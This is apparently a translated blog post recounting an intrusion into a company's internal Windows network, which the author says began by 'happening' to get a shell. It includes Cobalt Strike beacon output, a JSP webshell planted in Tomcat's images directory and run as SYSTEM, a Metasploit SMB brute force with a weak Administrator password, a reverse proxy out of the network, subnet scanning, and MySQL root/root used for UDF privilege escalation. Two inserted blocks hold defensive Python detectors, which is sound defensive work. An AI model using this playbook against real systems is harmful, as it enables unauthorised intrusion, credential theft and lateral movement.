Notes on an Internal Network Penetration Test

Author: print("")  Category: Information Security  Published: 2019-10-15 10:38

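I happened to get a shell and then spent a few days on internal network penetration. I did get something out of it.

There are no real techniques here, just some haphazard fumbling. Please go easy on me.

First, a quick description of the environment: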


WEB: internal host 192.168.1.231   (no domain controller, just a workgroup)

Database:  192.168.2.150   (MSSQL)

After getting the shell, I took a look at systeminfo:

OS 名称:          Microsoft Windows Server 2008 R2 Standard 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
处理器:           安装了 4 个处理器。
                  [01]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz
                  [02]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz
                  [03]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz
                  [04]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     32,768 MB
可用的物理内存:   28,347 MB
虚拟内存: 最大值: 65,533 MB
虚拟内存: 可用:   60,619 MB
虚拟内存: 使用中: 4,914 MB
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 278 个修补程序。

Privileges

beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
iis apppool\user11

beacon> shell tasklist
[*] Tasked beacon to run: tasklist
[+] host called home, sent: 39 bytes
[+] received output:

映像名称                       PID 会话名              会话#       内存使用 
========================= ======== ================ =========== ============
System Idle Process              0                            0         24 K
System                           4                            0        368 K
smss.exe                       416                            0      1,928 K
csrss.exe                      512                            0     11,100 K
wininit.exe                    552                            0      6,736 K
csrss.exe                      560                            1     11,988 K
winlogon.exe                   608                            1      6,956 K
services.exe                   656                            0     16,208 K
lsass.exe                      664                            0     32,736 K
lsm.exe                        672                            0      8,784 K
svchost.exe                    768                            0     14,580 K
svchost.exe                    836                            0     12,864 K
svchost.exe                    928                            0     20,888 K
LogonUI.exe                    948                            1     20,680 K
svchost.exe                    988                            0     61,276 K
svchost.exe                    232                            0     21,556 K
svchost.exe                    456                            0     23,472 K
KVSrvXP.exe                    548                            0      8,212 K
ZhuDongFangYu.exe             1076                            0     29,500 K
svchost.exe                   1112                            0     38,116 K
svchost.exe                   1252                            0     15,916 K
spoolsv.exe                   1416                            0     17,660 K
svchost.exe                   1456                            0     16,684 K
SMSvcHost.exe                 1484                            0     25,300 K
tomcat6.exe                   1688                            0    150,264 K
conhost.exe                   1712                            0      5,976 K
vmtoolsd.exe                  1720                            0     31,560 K
svchost.exe                   1760                            0     17,172 K
svchost.exe                   2516                            0     12,728 K
svchost.exe                   2560                            0      7,832 K
msdtc.exe                     2856                            0      9,872 K
LogonUI.exe                   3380                            0     19,416 K
csrss.exe                     9452                            2     19,644 K
winlogon.exe                  8228                            2      8,852 K
taskhost.exe                 10768                            2     17,132 K
rdpclip.exe                  10884                            2     10,792 K
dwm.exe                      10964                            2      8,660 K
explorer.exe                 11012                            2     85,648 K
360sd.exe                    11060                            2      2,880 K
vmtoolsd.exe                 10516                            2     26,124 K
KVMonXP.exe                    500                            2      4,076 K
SiteServer.Service.exe       10552                            2     87,260 K
360hotfix.exe                10576                            2     22,528 K
360tray.exe                   4024                            2     52,228 K
360DesktopLite64.exe          3868                            2    110,332 K
UKeyDetect.exe                3576                            2     16,612 K
conhost.exe                 372888                            0      4,788 K
360rp.exe                   349132                            2     35,320 K
cmd.exe                     385872                            0      4,472 K
conhost.exe                 385508                            0      4,588 K
cmd.exe                     382852                            0      4,484 K
conhost.exe                 383824                            0      4,580 K
rundll32.exe                386844                            0     37,568 K
cmd.exe                     386184                            0      4,512 K
conhost.exe                 380768                            0      4,884 K
w3wp.exe                    403908                            0    594,248 K
w3wp.exe                    408248                            0    483,596 K
dllhost.exe                 415040                            0     13,248 K
TrustedInstaller.exe        413620                            0     17,740 K
cmd.exe                     410940                            0      4,632 K
conhost.exe                 416436                            0      4,864 K
tasklist.exe                416528                            0      7,088 K
WmiPrvSE.exe                416228                            0      9,304 K

I noticed a tomcat6.0. I located the tomcat6 installation directory and uploaded a shell to it.

http://192.168.1.231:8081/manager/images/ccc.jsp?cmd=whoami

It ran with SYSTEM privileges.
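Added example, not part of the original post: a defender-side audit for the artifact described above, a JSP file sitting in a static-asset directory of a Tomcat webapp (here `manager/images/`). The list of static directory names and the sample tree are assumptions constructed for the demonstration.

```python
import os
import tempfile

# Directory names that normally hold only static assets (assumed list, extend as needed).
STATIC_DIRS = {"images", "img", "css", "js", "fonts", "static"}
# Extensions Tomcat compiles and executes as server-side code.
SCRIPT_EXTS = {".jsp", ".jspx", ".jspf"}

def find_scripts_in_static_dirs(webapps_root):
    """Return sorted relative paths of JSP files found under a static-asset directory."""
    hits = []
    for dirpath, _dirs, files in os.walk(webapps_root):
        rel_dir = os.path.relpath(dirpath, webapps_root)
        parts = {p.lower() for p in rel_dir.split(os.sep)}
        if not parts & STATIC_DIRS:
            continue  # not inside a directory that should be static-only
        for name in files:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                hits.append(os.path.join(rel_dir, name).replace(os.sep, "/"))
    return sorted(hits)

def build_sample_tree(root):
    """Constructed sample layout mirroring the URL path shown in the post."""
    layout = [
        "manager/index.jsp",          # legitimate JSP outside static dirs
        "manager/images/tomcat.gif",  # legitimate static asset
        "manager/images/ccc.jsp",     # executable file where only images belong
        "ROOT/index.jsp",
    ]
    for rel in layout:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()

def demo():
    """Build the sample tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return find_scripts_in_static_dirs(root)

if __name__ == "__main__":
    for hit in demo():
        print("unexpected script in static directory:", hit)
```

Running the Tomcat service under a dedicated low-privilege account instead of SYSTEM limits what such a file can do if it is ever planted.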

Then I brought it online in CS and read out the passwords.

First I forwarded the session to msf, then brute-forced logins with smb_login:

msf > use auxiliary/scanner/smb/smb_login
msf  auxiliary(smb_login) > show options
msf  auxiliary(smb_login) > set RHOSTS 192.168.1.150-155
msf  auxiliary(smb_login) > set SMBUser Administrator
msf  auxiliary(smb_login) > set SMBPass 123
msf  auxiliary(smb_login) > run

The brute force turned up three servers. I brought all of them online.
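Added example, not part of the original post: detection logic for the pattern this step leaves in Windows Security logs, one source trying the same account over the network against many hosts within seconds. The hostnames, timestamps and thresholds are constructed assumptions; the event IDs (4624/4625) and logon type 3 are the standard Windows values for network logons.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (hostnames are made up). 4625 = failed logon,
# 4624 = successful logon, logon type 3 = network logon (what SMB produces).
# Fields: time, logging host, event id, logon type, account, source address.
SAMPLE_EVENTS = [
    ("2019-10-12T02:14:01", "SRV150", 4625, 3, "Administrator", "192.168.1.231"),
    ("2019-10-12T02:14:01", "SRV151", 4624, 3, "Administrator", "192.168.1.231"),
    ("2019-10-12T02:14:02", "SRV152", 4625, 3, "Administrator", "192.168.1.231"),
    ("2019-10-12T02:14:02", "SRV153", 4624, 3, "Administrator", "192.168.1.231"),
    ("2019-10-12T02:14:03", "SRV154", 4624, 3, "Administrator", "192.168.1.231"),
    ("2019-10-12T02:14:03", "SRV155", 4625, 3, "Administrator", "192.168.1.231"),
    ("2019-10-12T09:00:10", "SRV150", 4624, 3, "backupsvc", "192.168.1.20"),
    ("2019-10-12T09:30:00", "SRV151", 4625, 3, "Administrator", "192.168.1.45"),
    ("2019-10-12T09:31:00", "SRV151", 4624, 10, "Administrator", "192.168.1.45"),
]

def detect_spray(events, min_hosts=4, window=timedelta(minutes=5)):
    """Flag a source that tries one account against many hosts in a short window."""
    by_key = defaultdict(list)
    for ts, host, eid, ltype, user, src in events:
        if eid in (4624, 4625) and ltype == 3:
            by_key[(src, user.lower())].append((datetime.fromisoformat(ts), host, eid))
    findings = []
    for (src, user), rows in sorted(by_key.items()):
        rows.sort()
        for i, (t0, _, _) in enumerate(rows):
            span = [r for r in rows[i:] if r[0] - t0 <= window]
            hosts = {h for _, h, _ in span}
            # Many targets plus at least one failure separates spraying from
            # an administrator legitimately touching several servers.
            if len(hosts) >= min_hosts and any(e == 4625 for _, _, e in span):
                findings.append({
                    "source": src,
                    "account": user,
                    "hosts_tried": len(hosts),
                    # Hosts that accepted the guess share a local admin password.
                    "succeeded_on": sorted({h for _, h, e in span if e == 4624}),
                })
                break
    return findings

if __name__ == "__main__":
    for finding in detect_spray(SAMPLE_EVENTS):
        print(finding)
```

Every host listed under `succeeded_on` needs its local Administrator password rotated to a unique value; reuse of one weak password across servers is what made a single guess work three times.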

Then, through a CS listener, I reverse-proxied the internal network out and scanned it.

The internal network looks roughly like this:

192.168.1.0/24 

192.168.2.0/24

192.168.3.0/24

192.168.4.0/24 

192.168.5.0/24

192.168.6.0/24

192.168.7.0/24

192.168.8.0/24

192.168.10.0/24 

192.168.20.0/24

192.168.30.0/24

192.168.40.0/24 

192.168.50.0/24

192.168.60.0/24

192.168.70.0/24

192.168.80.0/24

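Port scanning and probing found that 192.168.1.11 has 3306 open, with the credentials root / root.

Privilege escalation via UDF.

Then I continued bringing hosts online in CS.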
